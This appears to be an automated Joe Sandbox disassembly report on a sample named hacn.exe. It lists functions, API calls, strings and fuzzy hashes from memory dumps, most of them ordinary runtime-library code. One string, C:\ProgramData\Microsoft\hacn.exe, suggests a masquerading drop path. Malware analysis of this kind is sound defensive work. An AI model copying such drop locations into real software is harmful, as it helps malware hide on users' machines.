Fatal error detected, xrefs: 00007FF67D002AC6, 00007FF67D002AFE
%s%s: %s, xrefs: 00007FF67D002A6B

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction ID: 1973520481d870f5537a89543af5213587756f5179193ebd340a5a78704f27c5
Opcode Fuzzy Hash: 17bde7baa48798fc9044701dc9e2f5590094afa9c40027f5b89001a931553ba1
Instruction Fuzzy Hash: 9F312173638A8291E630DF10E4516DA6764FF847C4F406636EA8D82A99EF3CF745CB40

Function 00007FF67D01A118 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF67D01A13D
GetProcAddress.KERNEL32 ref: 00007FF67D01A153
FreeLibrary.KERNEL32 ref: 00007FF67D01A17A

Strings

CorExitProcess, xrefs: 00007FF67D01A14C
mscoree.dll, xrefs: 00007FF67D01A134

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction ID: 6c06bac17fd21a7cfa344499a62ab1790dfb6238a5b33d533b991b6a2712e83b
Opcode Fuzzy Hash: 6d37f3dc48988a17a5a16ca308b3de1e776b5d3bd2cbadce22e8a62f3d793b7e
Instruction Fuzzy Hash: F3F06263B2A70281EB108F74E8457796760AF48779F542B39C96EC61E8EF2DF485C340

Function 00007FF67D029D40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF67D029D68
_set_statfp.LIBCMT ref: 00007FF67D029D83
_set_statfp.LIBCMT ref: 00007FF67D029D9F
_set_statfp.LIBCMT ref: 00007FF67D029DDB

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: 4f8d08ac5a4a4a1a52f1ebddba413eb4dbd7ee5d2a27be33eace35f6adabc2da
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: F1117737EBEA0301F7549968F54637510416F95378F042F36E5AE86AEAFE2CB941A104

Function 00007FF67D01BA50 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BA6F
FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BA8E
FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAB6
FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAC7
FlsSetValue.KERNEL32(?,?,?,00007FF67D01AC67,?,?,00000000,00007FF67D01AF02,?,?,?,?,?,00007FF67D0131CC), ref: 00007FF67D01BAD8

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: b178397e9941e455d3fa8ed80ffb0c1af28058da3bfede487056c45115f89760
Instruction ID: 3409692c9465b7b2d9e9c10f5ecc65e2023e041cf5514c1e287a7b523d18a83b
Opcode Fuzzy Hash: b178397e9941e455d3fa8ed80ffb0c1af28058da3bfede487056c45115f89760
Instruction Fuzzy Hash: 4A11B123F2864245FA589F3695512BD29515F413B8F847B38E93DC67D6FF2DF4018200

Function 00007FF67D01B8E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF67D01B8F5
FlsSetValue.KERNEL32 ref: 00007FF67D01B914
FlsSetValue.KERNEL32 ref: 00007FF67D01B93C
FlsSetValue.KERNEL32 ref: 00007FF67D01B94D
FlsSetValue.KERNEL32 ref: 00007FF67D01B95E

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4712b96342f5867e5ae4f86c2ffffcef53fe1ffe9cc0e3bf397320bc2980f99b
Instruction ID: a1c9ce2b092d726eac8cffa112fcadc4d2832106f9720ffb3d48ba85286b8f8a
Opcode Fuzzy Hash: 4712b96342f5867e5ae4f86c2ffffcef53fe1ffe9cc0e3bf397320bc2980f99b
Instruction Fuzzy Hash: C4115E63E2D20745FA686F71945177E29814F46378F143F38D93ECA2D6FEAEB4025201

Function 00007FF67D0165B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0165F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D01671A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0167D0

Strings

verbose, xrefs: 00007FF67D0165C4

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: 1db06b57e67508a7bf805074a492edfff6c2f65ee846ad43c41bcdb5f7aee293
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: E691C02BA2864681F7218E25D86077D36A4AB44B5CFC46B3ADA5E873D5EE3EF4458300

Function 00007FF67D0206A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D020987

Part of subcall function 00007FF67D026AC4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D026AE1

Strings

UTF-16LEUNICODE, xrefs: 00007FF67D020925
ccs, xrefs: 00007FF67D0208C2
UTF-8, xrefs: 00007FF67D020906

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction ID: ca66fa64860b920a6c81002fb73def43e3d8f71ab4fcb9241692b359e895a110
Opcode Fuzzy Hash: 8562a2ddaa4935eebf24a1799f06cf0f98d553335d1454eb5137ecb29e0aa9bc
Instruction Fuzzy Hash: 0281C177E2A30285F764CF25811027A66A0FB10B4CF55AA35CA8AF7295FF6DF8019741

Function 00007FF67D00F0D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF67D00F124
_CallSETranslator.LIBVCRUNTIME ref: 00007FF67D00F173

Strings

MOC, xrefs: 00007FF67D00F138
RCC, xrefs: 00007FF67D00F141

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction ID: c7100b21cc60e57facff82b25f387776c4c34a1936da5ccb3a0ed7a1f16f11ea
Opcode Fuzzy Hash: 93df84ad8f7e49cea4bf2fe45b974ce3ad7a793f20ece70ff6f590e0afe80a83
Instruction Fuzzy Hash: 29617937A28B459AE710CF65D0803AD7BA0FB48BC8F045A25EE4D57B99EF78E055C700

Function 00007FF67D00F434 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF67D00F45C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF67D00F544

Strings

csm, xrefs: 00007FF67D00F596
csm, xrefs: 00007FF67D00F47E

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction ID: 7b1abd94a5bc4dc452948c4966c82b4a563ac4c30193216208b80930c48eecd0
Opcode Fuzzy Hash: bb0dbae594e6361f888f3677e997f8fccf17b68f1c0f59f7e08c923b6417c7cb
Instruction Fuzzy Hash: BD51AF339382429AEB648F1591842697BA0EB54BC8F186735DB9DC7B95EF3CF4509B00

Function 00007FF67D002890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D008BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF67D002ABB), ref: 00007FF67D008C1A

MessageBoxW.USER32 ref: 00007FF67D00299B
MessageBoxA.USER32 ref: 00007FF67D0029B7

Strings

Fatal error detected, xrefs: 00007FF67D002971, 00007FF67D0029A9
%s%s: %s, xrefs: 00007FF67D002916

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction ID: b486320e6541995335eee54312d016aee4e3d6170cc2f0b12ea1046be785a5b7
Opcode Fuzzy Hash: 6a476509950944f0bc5995eed920a659af08b50e3adf8d3da3d7a8787779b220
Instruction Fuzzy Hash: 4D314573638A8191E620EF10E4516DA6764FF847C4F405636E68D87A99EF3CF705CB40

Function 00007FF67D003ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF67D0039EA), ref: 00007FF67D003F01

Part of subcall function 00007FF67D0029E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF67D0088F2,?,?,?,?,?,?,?,?,?,?,?,00007FF67D00101D), ref: 00007FF67D002A14
Part of subcall function 00007FF67D0029E0: MessageBoxW.USER32 ref: 00007FF67D002AF0

Strings

GetModuleFileNameW, xrefs: 00007FF67D003F12
Failed to convert executable path to UTF-8., xrefs: 00007FF67D003F3A
Failed to get executable path., xrefs: 00007FF67D003F0B

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction ID: dbdd67ec131abdfa6aaa3a48bb0fd9dd330417e15eee8d4d7088cfc2e3fea3b4
Opcode Fuzzy Hash: 4067cf041b03358d9120c4033d5e670654b83d2b71477f60263b0e522fc37818
Instruction Fuzzy Hash: 54014423B39642A1FA61EF31D8557B95261AF4CBC8F402F36D84DC6696FE2CF1448704

Function 00007FF67D01CC60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF67D01CCDF
WriteFile.KERNEL32 ref: 00007FF67D01CFA7
WriteFile.KERNEL32 ref: 00007FF67D01CFED
GetLastError.KERNEL32 ref: 00007FF67D01D0A3

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction ID: 964f5abcede44e04b5f2354b4607dc28aadd9c367a4ac4f813e14177fa671239
Opcode Fuzzy Hash: ac6203f977c47ba8bc2a8f0cb0d6a0086fe2a36fe5d42d2389b6d07504d3a7ef
Instruction Fuzzy Hash: 6BD1FF33B28B8189E711CF65D4402AC7BB1FB4579CB049636CE5DA7B99EE39E406C310

Function 00007FF67D015954 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF67D015987
GetFileInformationByHandle.KERNEL32 ref: 00007FF67D0159E9
GetLastError.KERNEL32 ref: 00007FF67D015A7A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,?,00007FF67D01588C), ref: 00007FF67D015AC6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
Instruction ID: 182a9e3d0aadf9794b6ccb75515fbd7e445a1b6761d2c6bbf1fc076b336f0bec
Opcode Fuzzy Hash: 7cecb9a12d6adc5d813f4c9389116544f81f9d0d17ef3f6385b803a39347ee18
Instruction Fuzzy Hash: ED517E23A287418AF710DFB5D4943BD37B1AB48B9CF546A35DE0D8B689EF39E4448740

Function 00007FF67D002330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF67D002364
SetWindowLongPtrW.USER32 ref: 00007FF67D002386
GetWindowLongPtrW.USER32 ref: 00007FF67D0023B0
InvalidateRect.USER32 ref: 00007FF67D0023D0

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: b36e167ba6ddf2bbf17699c4949910cd3b67325db2765b7b6be17bd78edb809e
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: 1C11E922E3814242F754CF7AF5442791695EF88BC4F44A630EA498AB8EED3CF5C14600

Function 00007FF67D00C560 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF67D00C58C
GetCurrentThreadId.KERNEL32 ref: 00007FF67D00C59A
GetCurrentProcessId.KERNEL32 ref: 00007FF67D00C5A6
QueryPerformanceCounter.KERNEL32 ref: 00007FF67D00C5B6

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction ID: 4dd79f9f95e4d787ceba1d8cc188b7b9648faddd5880f007582726674cb1a425
Opcode Fuzzy Hash: b9418945c21ca9359366919164a8697e450450899f1773ca7228eb8eaa6a9b3b
Instruction Fuzzy Hash: 14111C26B25B0589EB00DF60E8542AD33A4FB19758F441F35DA6D867A8EF78E1988380

Function 00007FF67D02638C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67D021ED0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67D021F03

_get_daylight.LIBCMT ref: 00007FF67D0264A4
_get_daylight.LIBCMT ref: 00007FF67D0264B5

Strings

?, xrefs: 00007FF67D026435

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction ID: b7e7503e7ef2b596e7317c2f83525154407780bebb208f0d24aa79c561b9df15
Opcode Fuzzy Hash: 191dfcedb039f449dd25ac85e341943daf2aec9882a813766c2fb2958beeaf54
Instruction Fuzzy Hash: DB412727A2939242FB24CF25A40537A5A60EB907ACF545735EF9C86AD5FE3DF4418700

Function 00007FF67D0196A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF67D0196D6

Part of subcall function 00007FF67D01B00C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B022
Part of subcall function 00007FF67D01B00C: GetLastError.KERNEL32(?,?,?,00007FF67D023492,?,?,?,00007FF67D0234CF,?,?,00000000,00007FF67D023995,?,?,00000000,00007FF67D0238C7), ref: 00007FF67D01B02C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF67D00C0E5), ref: 00007FF67D0196F4

Strings

C:\ProgramData\Microsoft\hacn.exe, xrefs: 00007FF67D0196E2

Memory Dump Source

Source File: 00000001.00000002.1796384921.00007FF67D001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF67D000000, based on PE: true

Associated: 00000001.00000002.1795174225.00007FF67D000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1798312776.00007FF67D02B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D03E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1799605949.00007FF67D040000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1802148668.00007FF67D042000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff67d000000_hacn.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorFileLastModuleName_invalid_parameter_noinfo
String ID: C:\ProgramData\Microsoft\hacn.exe
